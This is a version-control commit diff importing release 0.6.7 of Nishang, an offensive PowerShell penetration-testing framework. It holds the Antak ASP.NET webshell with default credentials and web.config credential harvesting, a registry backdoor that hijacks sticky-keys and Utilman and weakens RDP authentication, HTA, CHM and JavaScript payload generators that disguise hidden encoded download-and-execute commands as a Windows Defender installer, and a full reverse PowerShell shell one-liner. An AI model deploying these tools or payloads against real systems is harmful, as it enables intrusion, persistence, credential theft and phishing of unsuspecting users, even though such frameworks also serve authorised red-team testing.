Commit 38b2151c authored by Sophie Brun's avatar Sophie Brun

Imported Upstream version 0.6.7

parent 51f02a27
function Get-Unconstrained {
<#
.SYNOPSIS
Nishang script which searches computers in current domain which have Unconstrained Delegation Enabled.
.DESCRIPTION
The script searches in the current domain for computers which have Unconstrained Delegation enabled.
The script needs to be run from an elevated shell. It requires ActiveDirectory module available with RSAT-AD-PowerShell
Windows feature. The feature and module are auto-enabled by the script on a Windows Server 2012 machine.
The commands used in this post are taken from this post https://adsecurity.org/?p=1667
.PARAMETER Details
Returns more detailed description of the computer with Unconstrained delegation.
.EXAMPLE
PS > Get-Unconstrained
Use above command to search for computers which have unconstrained delegation enabled. Shows name of the computers.
.EXAMPLE
PS > Get-Unconstrained -Details
Use above command to search for computers which have unconstrained delegation enabled. Shows detailed output.
.LINK
http://www.labofapenetrationtester.com/2016/02/getting-domain-admin-with-kerberos-unconstrained-delegation.html
https://adsecurity.org/?p=1667
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param (
[Parameter(Position = 0, Mandatory=$False)]
[Switch]
$Detailed
)
# Check if User is Elevated
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true)
{
Write-Warning "Run the Command as an Administrator"
break
}
#Check for Server 2012
$OSVersion = (Get-WmiObject -Class win32_OperatingSystem).BuildNumber
if($OSVersion -notmatch 96)
{
Write-Warning "This script needs ActiveDirectory module which is available in Server 2012 with RSAT-AD-PowerShell. For other Window versions, you need to install the module manually."
}
else
{
Write-Verbose "Running on Server 2012"
}
#Check if the Windows feature is already installed
if((Get-WindowsFeature -Name RSAT-AD-PowerShell).InstallState -ne "Installed")
{
Write-Warning "Required module not found. Installing it."
Add-WindowsFeature -Name RSAT-AD-Powershell -Verbose
}
else
{
Write-Verbose "Required module found. Continuing.."
}
#Import the required module
Write-Verbose "Importing the ActiveDirectory Module"
Import-Module ActiveDirectory
#Search for Unconstrained delegation
Write-Output "Searching for domain computers with Unconstrained Delegation"
$computer = Get-ADComputer -Filter {(TrustedForDelegation -eq $True) -and (PrimaryGroupID -eq 515)}
if ($Detailed)
{
Get-ADComputer $computer.Name -Properties *
}
else
{
$computer.DnsHostName
}
}
\ No newline at end of file
......@@ -2,16 +2,34 @@
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.IO.Compression" %>
<%--Antak - A Webshell which utilizes powershell.--%>
<%@ Import Namespace="Microsoft.VisualBasic" %>
<%--Antak - A Webshell which utilizes PowerShell.--%>
<script Language="c#" runat="server">
protected override void OnInit(EventArgs e)
{
output.Text = @"Welcome to Antak - A Webshell in Powershell
protected void Login_Click(object sender, EventArgs e)
{
// WARNING: Don't be lazy, change values below for username and password. Default credentials are disastrous.
// Default Username is "Disclaimer" and Password is "ForLegitUseOnly" without quotes and case-sensitive.
if (Username.Text == "Disclaimer" && Password.Text == "ForLegitUseOnly")
{
execution.Visible = true;
execution.Enabled = true;
authentication.Visible = false;
output.Text = @"Welcome to Antak - A Webshell which utilizes PowerShell
Use help for more details.
Use clear to clear the screen.";
}
}
protected override void OnInit(EventArgs e)
{
execution.Visible = false;
execution.Enabled = false;
}
string do_ps(string arg)
{
//This section based on cmdasp webshell by http://michaeldaw.org
......@@ -35,7 +53,7 @@ void ps(object sender, System.EventArgs e)
output.Text = @"Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind
while using commands (like changing current directory or running session aware scripts).
Executing PowerShell scripts on the target -
- Scripts can be executed on the target using any of the below methods:
1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
2. Use powershell one-liner (example below) for download & execute in the command box.
......@@ -46,21 +64,27 @@ IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Argument
4. Make the script a semi-colon separated one-liner.
Files can be uploaded and downloaded using the respective buttons.
Uploading a file -
- Uploading a file:
To upload a file you must mention the actual path on server (with write permissions) in command textbox.
(OS temporary directory like C:\Windows\Temp may be writable.)
Then use Browse and Upload buttons to upload file to that path.
Downloading a file -
- Downloading a file:
To download a file enter the actual path on the server in command textbox.
Then click on Download button.
- SQL Queries could be executed by following below steps:
1. Click on 'Parse Web.Config' button to get dabase connection string. By default, Antak looks for web.config in
the C:\Inetpub directory. You can specify a full path in the command box to look for web.config in other directory.
2. Paste that connection string in the textbox besides the 'Execute SQL Query' button.
3. Enter the SQL Query in the command box.
4. Click the 'Execute SQL Query' button.
Antak is a part of Nishang and updates could be found here:
https://github.com/samratashok/nishang
A detailed blog post on Antak could be found here
http://www.labofapenetrationtester.com/2014/06/introducing-antak.html
Blog posts about Antak could be found here
http://www.labofapenetrationtester.com/search/label/Antak
";
console.Text = string.Empty;
......@@ -89,12 +113,18 @@ void execcommand(string cmd)
console.Focus();
}
void base64encode(object sender, System.EventArgs e)
void base64encode(string inputstr)
{
// Compression and encoding directly stolen from Compress-PostScript by Carlos Perez
//http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
string contents = console.Text;
if (inputstr != "null")
{
contents = inputstr;
}
// Compress Script
......@@ -124,7 +154,6 @@ void base64encode(object sender, System.EventArgs e)
execcommand(command);
}
protected void uploadbutton_Click(object sender, EventArgs e)
{
......@@ -164,29 +193,74 @@ protected void downloadbutton_Click(object sender, EventArgs e)
}
}
protected void encode_Click(object sender, EventArgs e)
{
base64encode("null");
}
// PowerShell logic in ConnectionStr_Click and executesql_Click taken from https://github.com/NetSPI/cmdsql
protected void ConnectionStr_Click(object sender, EventArgs e)
{
output.Text = @"By default, web.config is searched for in C:\inetpub. To look at other location, specify the full path in the command textbox.
";
string webpath = "C:\\inetpub";
if (console.Text != string.Empty)
{
webpath = console.Text;
}
string pscode = "$ErrorActionPreference = \'SilentlyContinue\';$path=" + "\"" + webpath + "\"" + ";" + "Foreach ($file in (get-childitem $path -Filter web.config -Recurse)) {; Try { $xml = [xml](get-content $file.FullName) } Catch { continue };Try { $connstrings = $xml.get_DocumentElement() } Catch { continue };if ($connstrings.ConnectionStrings.encrypteddata.cipherdata.ciphervalue -ne $null){;$tempdir = (Get-Date).Ticks;new-item $env:temp\\$tempdir -ItemType directory | out-null; copy-item $file.FullName $env:temp\\$tempdir;$aspnet_regiis = (get-childitem $env:windir\\microsoft.net\\ -Filter aspnet_regiis.exe -recurse | select-object -last 1).FullName + \' -pdf \"\"connectionStrings\"\" \' + $env:temp + \'\\\' + $tempdir;Invoke-Expression $aspnet_regiis; Try { $xml = [xml](get-content $env:temp\\$tempdir\\$file) } Catch { continue };Try { $connstrings = $xml.get_DocumentElement() } Catch { continue };remove-item $env:temp\\$tempdir -recurse};Foreach ($_ in $connstrings.ConnectionStrings.add) { if ($_.connectionString -ne $NULL) { write-host \"\"$file.Fullname --- $_.connectionString\"\"} } };";
base64encode(pscode);
}
protected void executesql_Click(object sender, EventArgs e)
{
output.Text = @"Use a connection string retrieved from the server and copy it in the connection string textbox.
";
string Constr = sqlconnectiostr.Text;
string sqlcmd = console.Text;
string pscode = "$Connection = New-Object System.Data.SQLClient.SQLConnection;$Connection.ConnectionString = " + "\"" + Constr + "\"" + ";" + "$Connection.Open();$Command = New-Object System.Data.SQLClient.SQLCommand;$Command.Connection = $Connection;$Command.CommandText = " + "\"" + sqlcmd + "\"" + ";" + "$Reader = $Command.ExecuteReader();while ($reader.Read()) {;New-Object PSObject -Property @{Name = $reader.GetValue(0)};};$Connection.Close()";
base64encode(pscode);
}
</script>
<HTML>
<HEAD>
<title>Antak Webshell</title>
</HEAD>
<body bgcolor="#808080">
<div>
<form id="Form1" method="post" runat="server" style="background-color: #808080">
<div style="text-align:center; resize:vertical">
<asp:Panel ID="authentication" runat="server" HorizontalAlign="Center" >
<asp:TextBox ID="Username" runat="server" style="margin-left: 0px" Width="300px"></asp:TextBox> <br />
<asp:TextBox ID="Password" runat="server" Width="300px"></asp:TextBox><br />
<asp:Button ID="Login" runat="server" Text="Login" OnClick="Login_Click" Width="101px"/><br />
</asp:Panel>
<asp:Panel ID="execution" runat="server" >
<div runat="server" style="text-align:center; resize:vertical">
<asp:TextBox ID="output" runat="server" TextMode="MultiLine" BackColor="#012456" ForeColor="White" style="height: 526px; width: 891px;" ReadOnly="True"></asp:TextBox>
<asp:TextBox ID="console" runat="server" BackColor="#012456" ForeColor="Yellow" Width="891px" TextMode="MultiLine" Rows="1" onkeydown="if(event.keyCode == 13) document.getElementById('cmd').click()" Height="23px" AutoCompleteType="None"></asp:TextBox>
</div>
<div style="width: 1100px; text-align:center">
<div runat="server" style="width: auto; text-align:center">
<asp:Button ID="cmd" runat="server" Text="Submit" OnClick="ps" />
<asp:FileUpload ID="upload" runat="server"/>
<asp:Button ID="uploadbutton" runat="server" Text="Upload the File" OnClick="uploadbutton_Click" />
<asp:Button ID="encode" runat="server" Text="Encode and Execute" OnClick="base64encode" />
<asp:Button ID="downloadbutton" runat="server" Text="Download" OnClick="downloadbutton_Click" />
<asp:Button ID="encode" runat="server" Text="Encode and Execute" OnClick="encode_Click"/>
<asp:Button ID="downloadbutton" runat="server" Text="Download" OnClick="downloadbutton_Click" /> <br />
<asp:Button ID="ConnectionStr" runat="server" Text="Parse web.config" OnClick="ConnectionStr_Click"/>
<asp:Button ID="executesql" runat="server" Text="Execute SQL Query" OnClick="executesql_Click" />
<asp:TextBox ID="sqlconnectiostr" runat="server" Width="352px">Enter Connection String here to Execute SQL Queries</asp:TextBox>
</div>
</asp:Panel >
</form>
......

function Add-RegBackdoor
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $False)]
[String]
$Payload = "cmd.exe"
)
#Disable Network Level Authentication
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" -Name SecurityLayer -Value 1
New-Item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" -Name Debugger -Value $Payload
New-Item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe"
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" -Name Debugger -Value $Payload
}
\ No newline at end of file
......@@ -227,7 +227,7 @@ function DNS-TXT-Logic ($Startdomain, $cmdstring, $commanddomain, $psstring, $ps
if ($exfil -eq $True)
{
$pastename = $env:COMPUTERNAME + " Results of DNS TXT Pwnage: "
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$ExfilNS"
Do-Exfiltration-Dns "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$ExfilNS"
}
if ($exec -eq 1)
{
......@@ -278,7 +278,7 @@ function DNS-TXT-Logic ($Startdomain, $cmdstring, $commanddomain, $psstring, $ps
if ($exfil -eq $True)
{
$pastename = $env:COMPUTERNAME + " Results of DNS TXT Pwnage: "
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$ExfilNS"
Do-Exfiltration-Dns "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$ExfilNS"
}
if ($exec -eq 1)
{
......@@ -296,7 +296,7 @@ function DNS-TXT-Logic ($Startdomain, $cmdstring, $commanddomain, $psstring, $ps
'@
$exfiltration = @'
function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$ExfilNS)
function Do-Exfiltration-Dns($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$ExfilNS)
{
function post_http($url,$parameters)
{
......
......@@ -166,7 +166,7 @@ function Logic-Execute-OnTime ($PayloadURL, $Arguments, $time, $CheckURL, $StopS
$exec++
if ($exfil -eq $True)
{
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
Do-Exfiltration-Time "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
}
if ($exec -eq 1)
{
......@@ -184,7 +184,7 @@ function Logic-Execute-OnTime ($PayloadURL, $Arguments, $time, $CheckURL, $StopS
$exfiltration = @'
function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$AuthNS)
function Do-Exfiltration-Time($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$AuthNS)
{
function post_http($url,$parameters)
{
......
......@@ -186,7 +186,7 @@ function HTTP-Backdoor-Logic ($CheckURL, $PayloadURL, $Arguments, $MagicString,
if ($exfil -eq $True)
{
$pastename = $env:COMPUTERNAME + " Results of HTTP Backdoor: "
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
Do-Exfiltration-HTTP "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
}
if ($exec -eq 1)
{
......@@ -203,7 +203,7 @@ function HTTP-Backdoor-Logic ($CheckURL, $PayloadURL, $Arguments, $MagicString,
$exfiltration = @'
function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$ExfilNS)
function Do-Exfiltration-HTTP($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$ExfilNS)
{
function post_http($url,$parameters)
{
......
0.6.7
- Added Out-JS.ps1 in the Client directory.
- Added Out-SCT.ps1 in the Client directory.
- Added Invoke-JSRatRegsvr.ps1 in the Shells directory.
- Added Out-RundllCommand in the Execution directory.
0.6.6
- Added Invoke-JSRatRundll in the Shells directory.
0.6.5
- Updated Out-Word, Out-Excel, Out-HTA and Out-CHM. Now, scripts can directly be used as a payload.
- Updated Out-Word and Out-Excel. If a new document is now generated it tries to trick the target in enabling macros.
- Out-HTA uses inline VBScript now. A separate VBScirpt is not generated anymore.
0.6.4
- Added ActiveDirecotry directory.
- Added Get-UnConstrained.ps1 to the ActiveDirectory directory.
- Added Invoke-Mimikatz (mimikatz version 2.1 alpha 17/02//2016) to the Gather Directory.
0.6.3
- Added Invoke-Interceptor to the MITM directory.
0.6.2
- Added support for dumping cleartext credentials from RDP sessions for Invoke-MimikatzWfigestDowngrade.
0.6.1
- Added Show-TargetScreen to the Gather directory.
0.6.0
- Added Invoke-PsUACme to the Escalation directory.
0.5.9
- Added Get-PassHints to the Gather directory.
- Added Out-WebQuery and Get-PassHints to Powerpreter.
0.5.8
- Added Out-WebQuery to the Client directory.
- Added Start-CaptureServer to the Utility directory.
0.5.7
- Invoke-PoshRatHttps does not install root certificate anymore and certificate pinning is used.
- Added a disclaimer.
- Minor bugs in Powerpreter are fixed.
- Updates to Antak. Authentication and ability to execute SQL Queries added.
- Name of Do-Exfiltration changed in HTTP-Backdoor, DNS_TXT_Pwnage and Execute-On-Time
- Removed hard coded credentials from Invoke-PSGcat.ps1 and Invoke-PSGcat in Powerpreter. So embarrassing!
0.5.6
- Added Invoke-PowerShellIcmp to the Shells directory.
- Adjusted buffer for Invoke-PowerarShellTcp and Invoke-PowerShellUdp and one liners to show larger output.
0.5.5
- Added Invoke-PowerShellWmi to the Shells directory.
0.5.4
- Added Invoke-PoshRatHttps, Invoke-PosRatHttp and Remove-PoshRat to the Shells directory.
0.5.3
- Added Invoke-PowerShellUdp and Invoke-PowerShellUdpOneLiner to Shells directory.
0.5.2
- Added Invoke-PowerShellTcp and Invoke-PowerShellTcpOneLiner to Shells directory.
0.5.1
- Added Invoke-MimikatzWfigestDowngrade to Gather directory.
0.5.0.1
- Updated Powerpreter by adding Invoke_NetworkRelay and Gcat.
0.5.0
- Added Invoke-NetworkRelay to Pivot directory.
- Added Invoke-PsGcat and Invoke-PsGcatAgent to Shells directory.
......
......@@ -16,10 +16,17 @@ http://www.microsoft.com/en-us/download/details.aspx?id=21138
Payload which you want execute on the target.
.PARAMETER PayloadURL
URL of the powershell script which would be executed on the target.
URL of the PowerShell script which would be executed on the target.
.PARAMETER PayloadScript
Path to a PowerShell script on local machine.
Note that if the script expects any parameter passed to it, you must pass the parameters in the script itself.
.PARAMETER Arguments
Arguments to the powershell script to be executed on the target.
Arguments to the PowerShell script to be executed on the target.
.PARAMETER HHCPath
Path to the HTML Help Workshop on the attacker's machine.
.PARAMETER OutputPath
Path to the directory where the files would be saved. Default is the current directory.
......@@ -29,10 +36,18 @@ PS > Out-CHM -Payload "Get-Process" -HHCPath "C:\Program Files (x86)\HTML Help W
Above command would execute Get-Process on the target machine when the CHM file is opened.
.EXAMPLE
PS > Out-CHM -PayloadScript C:\nishang\Shells\Invoke-PowerShellTcpOneLine.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Use above when you want to use a PowerShell script as the payload. Note that if the script expects any parameter passed to it,
you must pass the parameters in the script itself.
.EXAMPLE
PS > Out-CHM -PayloadURL http://192.168.254.1/Get-Information.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Use above command to generate CHM file which download and execute the given powershell script in memory on target.
Use above command to generate CHM file which download and execute the given PowerShell script in memory on target.
.EXAMPLE
PS > Out-CHM -Payload "-EncodedCommand <>" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
......@@ -43,7 +58,7 @@ Use Invoke-Encode from Nishang to encode the command or script.
.EXAMPLE
PS > Out-CHM -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Use above command to pass an argument to the powershell script/module.
Use above command to pass an argument to the PowerShell script/module.
.LINK
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
......@@ -68,13 +83,17 @@ https://twitter.com/ithurricanept/status/534993743196090368
[Parameter(Position = 2, Mandatory = $False)]
[String]
$PayloadScript,
[Parameter(Position = 3, Mandatory = $False)]
[String]
$Arguments,
[Parameter(Position = 3, Mandatory = $True)]
[Parameter(Position = 4, Mandatory = $True)]
[String]
$HHCPath,
[Parameter(Position = 4, Mandatory = $False)]
[Parameter(Position = 5, Mandatory = $False)]
[String]
$OutputPath="$pwd"
)
......@@ -85,6 +104,48 @@ https://twitter.com/ithurricanept/status/534993743196090368
$Payload = "IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
}
if($PayloadScript)
{
#Logic to read, compress and Base64 encode the payload script.
$Enc = Get-Content $PayloadScript -Encoding Ascii
#Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]::Compress
$cs = New-Object IO.Compression.DeflateStream ($ms,$action)
$sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
$Enc | ForEach-Object {$sw.WriteLine($_)}
$sw.Close()
# Base64 encode stream
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$command = "Invoke-Expression `$(New-Object IO.StreamReader (" +
"`$(New-Object IO.Compression.DeflateStream (" +
"`$(New-Object IO.MemoryStream (,"+
"`$([Convert]::FromBase64String('$Compressed')))), " +
"[IO.Compression.CompressionMode]::Decompress)),"+
" [Text.Encoding]::ASCII)).ReadToEnd();"
#Generate Base64 encoded command to use with the powershell -encodedcommand paramter"
$UnicodeEncoder = New-Object System.Text.UnicodeEncoding
$EncScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($command))
if ($EncScript.Length -gt 8100)
{
Write-Warning "Payload too big for CHM! Try a smaller payload."
break
}
else
{
$Payload = "powershell.exe -WindowStyle hidden -nologo -noprofile -e $EncScript"
}
}
#Create the table of contents for the CHM
$CHMTableOfContents = @"
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
......
This diff is collapsed.
......@@ -3,12 +3,15 @@ function Out-HTA
{
<#
.SYNOPSIS
Nishang script which could be used for generating HTML Application and accompanying VBscript. These could be deployed on
a web server and powershell scripts and commands could be executed on the target machine.
Nishang script which could be used for generating "infected" HTML Application. It could be deployed on
a web server and PowerShell scripts and commands could be executed on the target machine.
.DESCRIPTION
The script generates two files. A HTA file and a VBScript. The HTA and VBScript should be deployed in same directory of a web server.
When a target browses to the HTA file the VBScript is executed. This VBScript is used to execute powershell scripts and commands.
The script generates a HTA file with inline VBScript. The HTA should be deployed on a web server.
When a target browses to the HTA file and chooses to run it, PowerShell commands and scripts in it are executed.
The HTA is not visible as it is closed quickly. But in case, if the HTA becomes visible (for example in case of an error), it loads
a live page related to Windows Defender from Microsoft website to look legit.
.PARAMETER Payload
Payload which you want execute on the target.
......@@ -16,18 +19,15 @@ Payload which you want execute on the target.
.PARAMETER PayloadURL
URL of the powershell script which would be executed on the target.
.PARAMETER PayloadScript
Path to the PowerShell script to be encoded in the HTA which would be executed on the target.
.PARAMETER Arguments
Arguments to the powershell script to be executed on the target.
Arguments to the PowerShell script to be executed on the target.
.PARAMETER HTAFilePath
Path to the HTA file to be generated. Default is with the name WindDef_WebInstall.hta in the current directory.
.PARAMETER VBFilename
Name of the VBScript file to be generated, use without ".vbs" extension. Default is launchps.vbs.
.PARAMETER VBFilepath
Path to the HTA file to be generated. Default is with the name launchps.vbs in the current directory.
.EXAMPLE
PS > Out-HTA -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem"
......@@ -41,7 +41,7 @@ Use above command to generate HTA and VBS files which download and execute the g
.EXAMPLE
PS > Out-HTA -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM
Use above command to pass an argument to the powershell script/module.
Use above command to pass an argument to the PowerShell script/module.
.LINK
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
......@@ -59,37 +59,73 @@ https://github.com/samratashok/nishang
[String]
$PayloadURL,
[Parameter(Position = 2, Mandatory = $False)]
[String]
$Arguments,
$PayloadScript,
[Parameter(Position = 3, Mandatory = $False)]
[String]
$VBFilename="launchps.vbs",
$Arguments,
[Parameter(Position = 4, Mandatory = $False)]
[String]
$HTAFilePath="$pwd\WindDef_WebInstall.hta",
$HTAFilePath="$pwd\WindDef_WebInstall.hta"
[Parameter(Position = 5, Mandatory = $False)]
[String]
$VBFilepath="$pwd\launchps.vbs"
)
if(!$Payload)
{
$Payload = "powershell.exe -ExecutionPolicy Bypass -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
$Payload = "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
}
if($PayloadScript)
{
#Logic to read, compress and Base64 encode the payload script.
$Enc = Get-Content $PayloadScript -Encoding Ascii
#Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]::Compress
$cs = New-Object IO.Compression.DeflateStream ($ms,$action)
$sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
$Enc | ForEach-Object {$sw.WriteLine($_)}
$sw.Close()
# Base64 encode stream
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$command = "Invoke-Expression `$(New-Object IO.StreamReader (" +
"`$(New-Object IO.Compression.DeflateStream (" +
"`$(New-Object IO.MemoryStream (,"+
"`$([Convert]::FromBase64String('$Compressed')))), " +
"[IO.Compression.CompressionMode]::Decompress)),"+
" [Text.Encoding]::ASCII)).ReadToEnd();"
#Generate Base64 encoded command to use with the powershell -encodedcommand paramter"
$UnicodeEncoder = New-Object System.Text.UnicodeEncoding
$EncScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($command))
$Payload = "powershell.exe -WindowStyle hidden -nologo -noprofile -e $EncScript"
}
$HTA = @"
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Windows Defender Web Install</title>
<script src="$VBFilename" type="text/vbscript" >
<script language="VBScript">
set oShell = CreateObject("Wscript.Shell")
oShell.Run("$Payload"),0,true
self.close()
</script>
<hta:application
id="oHTA"
......@@ -98,34 +134,14 @@ https://github.com/samratashok/nishang
>
</hta:application>
</head>
<SCRIPT TYPE="text/javascript">
function start(){
Initialize();
}
//-->
</SCRIPT>
<div>
<object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
</object></div>
<body onload="start()">
<body>
</body>
</html>
"@
$vbsscript = @"
Sub Initialize()
Set oShell = CreateObject( "WScript.Shell" )
ps = "$Payload"
oShell.run(ps),0,true
End Sub
"@
Out-File -InputObject $HTA -FilePath $HTAFilepath
Out-File -InputObject $vbsscript -FilePath $VBFilepath
Write-Output "HTA and VBS written to $HTAFilepath and $VBFilepath respectively."
Write-Output "HTA written to $HTAFilepath."
}
function Out-JS
{
<#
.SYNOPSIS
Nishang script useful for creating "weaponized" JavaScript file which could be used to run PowerShell commands and scripts.
.DESCRIPTION
The script generates a JavaScript file. The JavaScript file (default name Style.js) needs to be sent to a target.
As soon as a target user opens the JS file, the specified payload will be executed.
.PARAMETER Payload
Payload which you want execute on the target.
.PARAMETER PayloadURL
URL of the PowerShell script which would be executed on the target.
.PARAMETER Arguments
Arguments to the PowerShell script to be executed on the target.
.PARAMETER OutputPath
Path to the directory where the files would be saved. Default is the current directory.
.EXAMPLE
PS > Out-JS -PayloadURL http://192.168.230.1/Invoke-PowerShellUdp.ps1 -Arguments "Invoke-PowerShellUdp -Reverse -IPAddress 192.168.230.154 -Port 53"
Use above when you want to use the default payload, which is a powershell download and execute one-liner. A file
named "Style.js" would be generated in the current directory.
PS > Out-JS -PayloadURL http://192.168.230.1/Powerpreter.psm1 -Arguments "Get-Information;Get-Wlan-Keys"
Use above command for multiple payloads.
PS > Out-JS -Payload "`$sm=(New-Object Net.Sockets.TCPClient('192.168.230.154',443)).GetStream();[byte[]]`$bt=0..65535|%{0};while((`$i=`$sm.Read(`$bt, 0, `$bt.Length)) -ne 0){;`$d=(New-Object Text.ASCIIEncoding).GetString(`$bt,0, `$i);`$sb=(iex `$d 2>&1 | Out-String );`$sb2=`$sb + 'PS ' + (pwd).Path + '> ';`$sb=([text.encoding]::ASCII).GetBytes(`$sb2);`$sm.Write(`$sb,0,`$sb.Length);`$sm.Flush()}"
Use above for a Reverse PowerShell Session. Note that there is no need of download-execute in this case.
.LINK
http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(